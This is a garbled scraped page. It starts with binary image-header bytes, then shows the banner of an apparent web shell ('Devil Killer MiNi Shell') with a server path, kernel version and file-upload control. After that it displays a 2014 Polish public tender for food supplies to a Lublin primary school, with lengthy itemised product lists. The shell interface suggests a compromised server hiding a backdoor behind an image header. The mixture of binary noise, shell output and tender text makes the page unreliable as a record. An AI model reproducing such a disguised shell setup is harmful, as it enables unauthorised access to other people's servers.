JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140709/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140709/230030-N-2014.html

<p class="kh_header"><b>Lublin: Zakup i dostawa artykułów żywnościowych</b><br>
<b>Numer ogłoszenia: 230030 - 2014; data zamieszczenia: 09.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szkoła Podstawowa nr 28 , ul. Radości 13, 20-530 Lublin, woj. lubelskie, tel. 0-81 5339272, faks 0-81 5339272.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sp28.bip.lublin.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jedostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawa artykułów żywnościowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Na przedmiot zamówienia składa się sukcesywny zakup i dostawa artykułów żywnościowych dla potrzeb stołówki Szkoły Podstawowej nr 28 w Lublinie w odniesieniu do 7 części zamówienia zgodnie z załącznikami do ogłoszenia dotyczącymi informacji o ofertach częściowych.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9, 15.22.00.00-6, 15.31.00.00-4, 15.51.00.00-6, 15.80.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zrealizowali w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,  co najmniej 
2 dostawy o wartości brutto każdej dostawy nie mniejszej niż wartość brutto oferowana , które  zostały wykonane lub są wykonywane należycie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Informacja Wykonawcy o powierzeniu wykonania części zamówienia podwykonawcy. W odniesieniu do przedmiotu zamówienia Zamawiający za część zamówienia rozumie: sprzedaż artykułów żywnościowych i dostawa (transport). Zamawiający nie zastrzega osobistego wykonania przez wykonawcę części zamówienia, o których mowa w zapisie poprzednim</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Istotne zmiany umowy, ich dopuszczalność oraz warunki zmian :
Podane w opisie przedmiotu zamówienia ilości mogą zostać zmniejszone lub zwiększone o określoną wartość procentową tj. : + - 10%.
Zmiana cen jednostkowych brutto dostarczanych produktów oparta będzie na klauzuli waloryzacji cen, o ile Wykonawca w sposób obiektywny ekonomicznie na podstawie wniosku oraz przedłożonych dokumentów uzasadni potrzebę ich zmian.
Zmiana cen jednostkowych brutto dotyczyła będzie także sezonowości tj. spadku lub wzrostu cen związanej z cyklem wytwarzania produktów.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sp28.bip.lublin.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szkoła Podstawowa nr 28, 20-530 Lublin, ul. Radości 13.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.07.2014 godzina 11:00, miejsce: Szkoła Podstawowa nr 28, 20-530 Lublin, ul. Radości 13, pok. 200.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Produkty zwierzęce, mięso i produkty mięsne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa asortymentu	Jedn. miary	Ilość
1.	Szponder	kg	100
2.	Wołowina ekstra	kg	300
3.	Wołowina kl. II 	kg	100
4.	Mięso mielone wieprzowo - wołowe	kg	100
5.	Żeberka wieprzowe paski	kg	200
6.	Karczek wieprzowy b/k	kg	750
7.	Łopatka wieprzowa b/k	kg	750
8.	Schab wieprzowy b/k	kg	650
9.	Wątroba wieprzowa	kg	120
10.	Kiełbasa biała	kg	250
11.	Bok wędzony	kg	300
12.	Parówki cielęce ekstra	kg	40
13.	Kiełbasa Podwawelska	kg	250
14.	Szynka wieprzowa gotowana	kg	30
15.	Mielonka Szynka Tyrolska 	kg	30
16.	Polędwica sopocka	kg	30
17.	Polędwica drobiowa	kg	30
18.	Filety z kurczaka pojedyncze	kg	400
19.	Filety z indyka	kg	400
20.	Udziec z kurczaka	kg	1700
21.	Korpusy drobiowe	kg	250
22.	Mięso drobiowe Ekstra kurczak	kg	50
23.	Smalec	kg	100
24.	Słonina	kg	80
25.	Kury rosołowe	kg	50
26.	Polędwiczki wieprzowe	kg	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Ryby mrożone, filety rybne i pozostałe mięso z ryb Warzywa i owoce mrożone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa asortymentu	Jedn. miary	Ilość
1.	Filety rybne mrożone miruna bez glazury	kg	1000
2.	Konserwa rybna śledź w oleju	szt.	60
3.	Filet pstrąga świeży	kg	150
4.	Konserwa rybna makrela w oleju	szt.	60
5.	Fasola szparagowa żółta mrożona cięta	kg	100
6.	Fasola szparagowa zielona mrożona cięta	kg	300
7.	Mieszanka kompotowa mrożona	kg	200
8.	Kalafior mrożony polski	kg	100
9.	Truskawka mrożona	kg	300
10.	Brokuł mrożony	kg	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.22.00.00-6, 15.31.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Ziemniaki, warzywa, owoce świeże i przetworzone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa asortymentu	Jedn. miary	Ilość
1.	Ziemniaki jadalne polskie workowane a30kg	kg	30 000
2.	Kapusta kwaszona	kg	1 500
3.	Ogórek kiszony	kg	500
4.	Burak czerwony długi	kg	750
5.	Cebula czerwona	kg	50
6.	Cebula biała polska	kg	1 500
6.	Czosnek główka polski	szt.	400
7.	Marchew korzeń polska	kg	2 500
8.	Ogórek świeży	kg	500
9.	Pietruszka korzeń polska	kg	900
10.	Rzodkiewka  pęczek min. 200g	pęczek	150
11.	Rzepa biała	kg	300
12.	Seler bulwa	kg	250
13.	Fasola Jaś duży	kg	350
14.	Fasola Jaś drobny	kg	100
15.	Groch łupany	kg	70
16.	Papryka świeża	kg	200
17.	Pomidor świeży	kg	500
18.	Brokuły	szt.	300
19.	Botwinka min. 350g	pęczek	60
20.	Kapusta pekińska	kg	300
21.	Kapusta czerwona	kg	250
22.	Kalafior świeży  	szt.	300
23.	Kapusta biała 	kg	400
24.	Kapusta młoda polska	szt.	400
25.	Koper pęczek min. 100g	szt.	700
26.	Natka pietruszki pęczek min. 100g	szt.	1 000
27.	Por	kg	160
28.	Szczaw	kg	50
29.	Szczypior pęczek min. 150g	szt.	700
30.	Sałata masłowa główka min. 450g	szt.	1 200
31.	Pieczarka świeża	kg	200
32.	Fasola szparagowa żółta świeża	kg	100
33.	Fasola szparagowa zielona świeża	kg	100
34.	Banany	kg	5 000
35.	Gruszki polskie	kg	2 000
36.	Jabłka polskie	kg	3 000
37.	Maliny polskie	kg	200
38.	Mandarynki	kg	300
39.	Morele	kg	50
40.	Nektarynki	kg	100
41.	Pomarańcze	kg	500
42.	Śliwka węgierka	kg	300
43.	Truskawka świeża	kg	250
44.	Brzoskwinie	kg	300
45.	Ziemniak młody polski jadalny	kg	2 500
46.	Kiwi	kg	350
47.	Marchew polska młoda jadalna	pęczek	200
48.	Pietruszka polska młoda jadalna	pęczek	150
49.	Sałata rzymska min. 400g główka	szt	500
50.	Seler naciowy min. 250 g pęczek	pęczek	100
51.	Soczewica czerwona łupana	kg	100
52.	Brukselka	kg	300
53.	Cebula cukrowa polska	kg	200
54.	Sałata mix min. 600g w workach foliowych	szt.	400
55.	Sałata rukola	szt	500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.31.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Mleko, śmietana, nabiał.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa asortymentu	Jedn. miary	Ilość
1.	Mleko 2 %  butelka plastikowa 1l	szt.	6000
2.	Śmietana 12% opakowanie 400g	szt.	2050
3.	Serek topiony śmietanowy min. 100g	szt.	150
4.	Śmietana 30% opakowanie 400 g	szt.	2500
5.	Masło ekstra kostka 200g min. 82% tłuszczu zwierzęcego	szt.	1300
6.	Ser twarogowy półtłusty w pergaminie	kg	300
7.	Ser żółty Edamski	kg	100
8.	Serek homogenizowany owocowy 150 g różne smaki	szt.	4000
9.	Jogurt naturalny opak. 400 ml	szt.	50
10.	Jogurt owocowy opak  150 ml różne smaki	szt.	6000
11.	Jogurt owocowy pitny min. 350 g butelka różne smaki	szt.	4000
12.	Śmietana 18% tłuszczu zwierzęcego op. 1000g	szt.	1000
13.	Serek homogenizowany waniliowy 150g	szt.	5500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.51.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Wyroby mączne garmażeryjne do gotowania i smażenia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa asortymentu	Jedn. miary	Ilość
1.	Kopytka świeże	kg	1400
2.	Kluski śląskie świeże	kg	800
3.	Pierogi wiejskie świeże	kg	800
4.	Pierogi z kapustą i pieczarkami	kg	300
5.	Pierogi z mięsem	kg	500
6.	Pierogi ruskie	kg	1300
7.	Naleśniki	kg	1000
8.	Kluski leniwe	kg	1000
9.	Knedle ze śliwką	kg	600
10.	Krokiety z kapustą i pieczarkami	kg	600
11.	Pyzy ziemniaczane	kg	600
12.	Pyzy z mięsem 	kg	700
13.	Krokiety z mięsem	kg	600.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.51.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Różne produkty spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa asortymentu	Jedn. miary	Ilość
1.	Cukier a1kg	szt.	1500
2.	Cukier waniliowy 32g	szt.	100
3.	Miód naturalny słoik 300g polski	szt.	60
4.	Kakao rozpuszczalne 300g Puchatek	szt.	100
5.	Czekolada 250g	szt.	1600
6.	Cukierki czekoladowe Mieszanka Solidarność różne	kg	50
7.	Draże orzechowe 100g	szt.	550
8.	Herbata granulowana Lipton 100g	szt.	70
9.	Ocet spirytusowy 10% a0,5l	szt.	10
10.	Sos sałatkowo-koperkowy proszek a0,8 typu Knorr lub równoważny 	szt.	20
11.	Sos grecki proszek a 0,8 typu Knorr lub równoważny	szt.	20
12.	Sos pieczeniowy proszek a 0,8 typu Knorr lub równoważny	szt.	30
13.	Sos boloński proszek a 0,8 typu Knorr lub równoważny	szt.	30
14.	Sos grzybowy proszek a 0,8 typu Knorr lub równoważny	szt.	10
15.	Majonez sałatkowy a3kg	szt.	20
16.	Przyprawa do chińszczyzny op.1kg	szt.	10
17.	Papryka słodka 800g	szt.	15
18.	Papryka ostra 800g	szt.	10
19.	Pieprz ziołowy 700g	szt.	15
20.	Przyprawa do zup Maggi 960g	szt.	200
21.	Sól kuchenna a1kg	szt.	450
22.	Ziele angielskie 600g	szt.	20
23.	Zioła prowansalskie 300g	szt.	3
24.	Pieprz naturalny 800g	szt.	25
25.	Majeranek tarty 150g	szt.	30
26.	Liść laurowy 100g	szt.	50
27.	Kminek 550g	szt.	10
28.	Kwasek cytrynowy a1,3kg	szt.	25
29.	Vegeta bez glutaminianu sodu 200g	szt.	800
30.	Barszcz czerwony koncentrat a1,4kg typu Knorr lub równoważny	szt.	30
31.	Rosół z kury w proszku 0,9kg typu Knorr lub równoważny	szt.	50
32.	Rosół wołowy w proszku 0,9kg typu Knorr lub równoważny	szt.	40
33.	Zupa brokułowa w proszku a1,3kg typu Knorr lub równoważny	szt.	10
34.	Zupa żur w proszku a1,3 typu Knorr lub równoważny	szt.	15
35.	Zupa gulaszowa a1,3kg typu Knorr lub równoważny	szt.	15
36.	Marynata do drobiu 700g typu Knorr lub równoważny	szt.	30
37.	Marynata do wieprzowiny 700g typu Knorr lub równoważny	szt.	10
38.	Groszek konserwowy 400g polski	szt.	250
39.	Kukurydza konserwowa 340g polska	szt.	250
40.	Koncentrat pomidorowy 30% 300g Pudliszki	szt.	700
41.	Wafelki w czekoladzie 50g	szt.	5500
42.	Keczup 500g Pudliszki	szt.	10
43.	Chrzan słoik 370ml Rebok	szt.	100
44.	Dżem truskawkowy 280g	szt.	100
45.	Deser czekoladowy Monte	szt.	6000
46.	Galaretka owocowa w proszku 1,3kg Winiary	szt.	60
47.	Pasta orzechowa do smarowania Nutella 400g	szt.	50
48.	Olej rzepakowy 0,9l	szt.	20
49.	Olej słonecznikowy 0,9l	szt.	1100
50.	Brzoskwinie w syropie 450g	szt.	200
51.	Ananas w syropie 450g	szt.	300
52.	Sok owocowy Kubuś Play	szt.	8000
53.	Syropy owocowe bez konserwantów 430ml	szt.	1800
54.	Soki owocowe w kartonie 200ml	szt.	2000
55.	Soki warzywno-owocowe karton 200ml 	szt.	1000
56.	Ryż długoziarnisty biały a1kg	kg	250
57.	Ryż paraboliczny a5kg	kg	400
58.	Mąka pszenna tortowa a1kg	kg	700
59.	Mąka ziemniaczana a1kg	kg	40
60.	Jaja wielkość L	szt.	10000
61.	Płatki kukurydziane opak 0,50 kg	szt.	70
62.	Płatki owsiane opak 400g	szt.	25
63.	Płatki kulki czekoladowe op. 0,5 kg	szt.	60
64.	Kasza manna a400g	szt.	15
65.	Kasza jęczmienna wiejska a1kg	kg	350
66.	Kasza gryczana a1 kg	kg	200
67.	Kawa zbożowa INKA opak 150g	szt.	10
68.	Makaron nitka cięta As babuni rosołowa 4 jajeczna	kg	350
69.	Makaron świderek 100% mąki durumdurum	kg	800
70.	Makaron kolanko z falbanką 100% mąki durumdurum	kg	600
71.	Makaron łazanki 100% mąki durumdurum	kg	300
72.	Makaron spaghetti 100% mąki durumdurum	kg	250
